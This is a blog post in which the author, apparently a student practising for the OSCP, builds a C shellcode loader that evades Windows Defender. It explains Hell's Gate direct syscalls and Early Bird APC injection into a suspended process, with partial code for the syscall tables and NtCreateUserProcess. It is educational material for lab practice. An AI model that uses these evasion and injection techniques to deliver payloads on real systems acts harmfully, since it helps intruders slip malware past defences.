Windows Shellcode Loader in C

Opening Thoughts

Over the past couple months I have gone through the Zero2Automated malware RE course, and the Malware Development course from MalDev Academy. The malware RE course is pretty easy to practice as there are plenty of samples and challenges online to reverse, but finding a challenge for malware development is a bit trickier. Fortunately, I ran into some problems while studying for the OSCP exam and doing HackTheBox. Many of the boxes running Windows 10 were able to detect msfvenom, mimikatz, and other malicous powershell scripts which made it very difficult to get a reverse shell on what should have been very simple boxes. The OSCP teaches to use Shellter, but even this tool was failing to bypass Defender. At this point I figured it’d be a good investment to build my own loader so that I wouldn’t ever have to worry about this issue again. I had actually done this project once in C++, but hindsight is 20/20 and I arrived at the conclusion that writing it in C is the best option. My reasoning is that a loader isn’t super complicated, so the organization and object oriented approach that C++ offers doesn’t really offer any benefit. And the added overhead from C++ just makes the final executable larger. Since I’ll be working on boxes where the network bandwidth isn’t great, a small and portable executable is better.

Design

I was talking to this one person who’s been developing game cheats for over 10 years and he told me that all you really need is memory injection and streaming relocations. Streaming relocations is a bit overkill for this project, so I’ll skip that but the injection is definitely optimal. In the first version I had used APC injection, and ran into issues with my shell dying once the original process terminated. I’m sure I could fix it, but since this is supposed to be an improvement over my 1.0 loader I want to go with remote APC injection, aka Early Bird APC injection. I will also need a quick and easy way of hashing strings, and encrypting my msfvenom payloads. For these requirments I’ll just use the same code snippets as taught in the MalDev course since crypto isn’t one of my strengths.

Hell’s Gate

Window’s syscall’s are the API’s that carry out the actions when a WinAPI is called. The example given in the course is that VirtualAlloc and VirtualAllocEx use the NtAllocateVirtualMemory to carry out their actions. All the syscalls return an NTSTATUS value that indicates an error code. We can use the following docs since most syscalls aren’t documented by Microsoft:

The main advantage to using syscalls is that we can evade hooked WinAPI. Syscalls will have the following structure:

1
2
3
mov r10, rcx
mov eax, SSN
syscall

SSN referes to the syscall service number that the kernel uses to distinguish one syscall from another. It’s important to note that these values will differ for the same syscall across different OS and OS versions.

Hell’s Gate is a technique that can read through ntdll.dll to find and execute syscalls. It’s a pretty complex technique that I won’t go over here since that isn’t the purpose of this post. But you can read about it here. We can follow the guidance in that paper to get the technique working. Long story short, we will add a VX_TABLE_ENTRY to our VX_TABLE for every syscall we want to use:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
typedef struct _VX_TABLE_ENTRY {
    PVOID pAddress;
    DWORD dwHash;
    WORD  wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

typedef struct _VX_TABLE {
    VX_TABLE_ENTRY NtCreateUserProcess;
    VX_TABLE_ENTRY <some_syscall>;
}

This table will be populated via the GetVxTableEntry(...) function given in the paper.

Then HellsGate function just loads up the correct SSN to be called, and then HellDescent actually makes the call:

1
2
HellsGate(g_Sys.NtSyscallEntry.wSystemCall);
HellDescent(arg1, arg2, arg3, ...);

Early Bird APC Injection

Asynchronous Procedure Calls (APC’s) are functions that execute async in the context of a specific thread. We can queue an APC to a thread, and the next time the thread is scheduled, it will run the APC function. In order to run an APC generated by an application, the thread we use must be in an alertable state, which just means that it is in a “wait” state. The early bird part of this technique just refers to a remote process instead of the local one. So we would do the following:

Spawn process in suspended state.
Write payload to address space of suspended process.
Get a handle to the suspended thread.
Pass in address of payload new address, and handle to QueueUserAPC.
Resume thread and wait for payload to run.

Something interesting to note is that normally you’d spawn the process like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

CreateProcessA(
    NULL, 
    lpPath,
    NULL,
    NULL,
    FALSE,
    DEBUG_PROCESS // dwCreationFlags,
    NULL,
    NULL,
    &StartupInfo,
    &ProcInfo)

However I am using the syscall NtCreateUserProcess, so I need to use a slightly different calling convention.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 // NtCreateUserProcess & NtCreateThreadEx

HellsGate(g_Sys.NtCreateUserProcess.wSystemCall);
HellDescent(
    hProcess,
    hThread,
    PROCESS_ALL_ACCESS,
    NULL,
    NULL,
    NULL,
    THREAD_CREATE_FLAGS_CREATE_SUSPENDED,
    UppProcessParameters,
    &psCreateInfo,
    pAttributeList
);

To learn more about how NtCreateUserProcess works I recommend this blog.

Now we just write our payload into the memory space of this process. For this, we need to update our syscall table structure with 3 more syscalls:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
typedef NTSTATUS(NTAPI* fnNtAllocateVirtualMemory)(
    HANDLE      ProcessHandle,
    PVOID*      BaseAddress,
    ULONG_PTR   ZeroBits,
    PSIZE_T     RegionSize,
    ULONG       AllocationType,
    ULONG       Protect,
);
typedef NTSTATUS(NTAPI* fnNtProtectVirtualMemory)(
    HANDLE  ProcessHandle,
    PVOID*  BaseAddress,
    PULONG  NumberOfBytesToProtect,
    ULONG   NewAccessProtection,
    PULONG  OldAccesProtection
);
typedef NTSTATUS(NTAPI* fnNtWriteVirtualMemory)(
    HANDLE  ProcessHandle,
    PVOID   BaseAddress,
    PVOID   Buffer,
    ULONG   NumberOfBytesToWrite,
    PULONG  NumberOfBytesWritten
);